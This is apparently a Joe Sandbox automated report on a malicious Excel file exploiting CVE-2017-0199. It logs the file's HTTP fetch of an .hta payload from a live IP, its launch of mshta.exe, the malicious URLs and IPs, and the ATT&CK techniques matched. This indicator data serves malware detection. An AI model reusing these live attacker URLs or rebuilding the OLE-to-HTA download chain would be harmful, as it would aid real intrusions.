Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: global trafficHTTP traffic detected: GET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.12
Source: global trafficDNS traffic detected: DNS query: curt.wiz.co
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: Document.xla.xlsx, FD640000.0.drString found in binary or memory: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.2.5:49826 version: TLS 1.2

System Summary

barindex
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: ~DF91BB5DAD83C09994.TMP.0.drOLE: Microsoft Excel 2007+
Source: ~DF8E01927982CC6CE9.TMP.0.drOLE: Microsoft Excel 2007+
Source: FD640000.0.drOLE: Microsoft Excel 2007+
Source: FD640000.0.drOLE: Microsoft Excel 2007+
Source: FD640000.0.drOLE: Microsoft Excel 2007+
Source: FD640000.0.drOLE: Microsoft Excel 2007+
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\createdbetterthingswithgreatnressgivenmebackwithnice[1].htaJump to behavior
Source: Document.xla.xlsxOLE indicator, VBA macros: true
Source: FD640000.0.drOLE indicator, VBA macros: true
Source: Document.xla.xlsxStream path 'MBD010681DE/\x1Ole' : https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2h6jl/+kw^EMY%q*1W_Ua^8U\hn8[#+o$j=ru]2uhkN8EWIJW7=>1[&o%XWG1ygEnllZuiJ4eX3jO8wnPvcj0aiVH7z4PcIFxDFm5AJmEGQrkKJjBBimLsrH41avolZKeP8bFWxIXc6PjnfrNnfq0B$HS[;<8/I4#m
Source: FD640000.0.drStream path 'MBD010681DE/\x1Ole' : https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2h6jl/+kw^EMY%q*1W_Ua^8U\hn8[#+o$j=ru]2uhkN8EWIJW7=>1[&o%XWG1ygEnllZuiJ4eX3jO8wnPvcj0aiVH7z4PcIFxDFm5AJmEGQrkKJjBBimLsrH41avolZKeP8bFWxIXc6PjnfrNnfq0B$HS[;<8/I4#m
Source: ~DF91BB5DAD83C09994.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF8E01927982CC6CE9.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'document.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal80.expl.winXLSX@6/32@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Document.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D1B7BE0B-EDE5-4375-B688-FDA77E6A67DB} - OProcSessId.datJump to behavior
Source: Document.xla.xlsxOLE indicator, Workbook stream: true
Source: FD640000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Document.xla.xlsxReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Document.xla.xlsxStatic file information: File size 1106944 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ~DF91BB5DAD83C09994.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: Document.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Document.xla.xlsxStream path 'MBD010681DC/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: Document.xla.xlsxStream path 'Workbook' entropy: 7.99863707372 (max. 8.0)
Source: FD640000.0.drStream path 'MBD010681DC/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: FD640000.0.drStream path 'Workbook' entropy: 7.97948292079 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 773Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Document.xla.xlsx21%ReversingLabsDocument-Office.Exploit.CVE-2017-0199
Document.xla.xlsx100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood100%Avira URL Cloudmalware
https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    s-part-0035.t-0009.t-msedge.net
    13.107.246.63
    truefalse
      high
      curt.wiz.co.cdn.gocache.net
      170.82.174.30
      truefalse
        high
        curt.wiz.co
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&moodfalse
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2Document.xla.xlsx, FD640000.0.drfalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          170.82.174.30
          curt.wiz.co.cdn.gocache.netBrazil
          2664443LCLOUDINTERNETSERVICESLTDA-EPPBRfalse
          172.245.123.12
          unknownUnited States
          36352AS-COLOCROSSINGUSfalse
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1576236
          Start date and time:2024-12-16 17:16:56 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 16s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Without Instrumentation
          Number of analysed new started processes analysed:12
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Document.xla.xlsx
          Detection:MAL
          Classification:mal80.expl.winXLSX@6/32@1/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xlsx
          • Changed system and user locale, location and keyboard layout to French - France
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, svchost.exe, MavInject32.exe
          • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.76.243, 23.218.208.109, 52.113.194.132, 199.232.214.172, 52.182.141.63, 20.189.173.11, 2.20.68.210, 2.20.68.201, 51.105.71.136, 20.231.128.67, 52.149.20.212, 13.107.246.63
          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, onedscolprdwus10.westus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprduks00.uksouth.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, download.w
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadFile calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Document.xla.xlsx
          TimeTypeDescription
          11:18:58API Interceptor841x Sleep call for process: splwow64.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          170.82.174.30yGktPvplJn.exeGet hashmaliciousPushdoBrowse
          • www.mqs.com.br/
          a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
          • www.mqs.com.br/
          9oy0DlGMH9.exeGet hashmaliciousFormBookBrowse
          • www.faunapetsstore.com/o12i/?dT=j6ATUBhxx2glQbP0&2dq=yiHtOwR0aZ7KTWOJuT9hXfachgSHyHMGkjU/6QKzyqsTP1NPRASfxqCAR1p/c7wMh9GXgUQg6w==
          file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
          • www.mqs.com.br/
          file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
          • www.mqs.com.br/
          file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
          • www.mqs.com.br/
          172.245.123.12seemebestgoodluckthings.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
          • 172.245.123.12/361/TELNERA.txt
          PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
          • 172.245.123.12/361/TELNERA.txt
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          curt.wiz.co.cdn.gocache.netSmple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.174.30
          Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
          • 170.82.173.30
          s-part-0035.t-0009.t-msedge.netSmple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
          • 13.107.246.63
          Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
          • 13.107.246.63
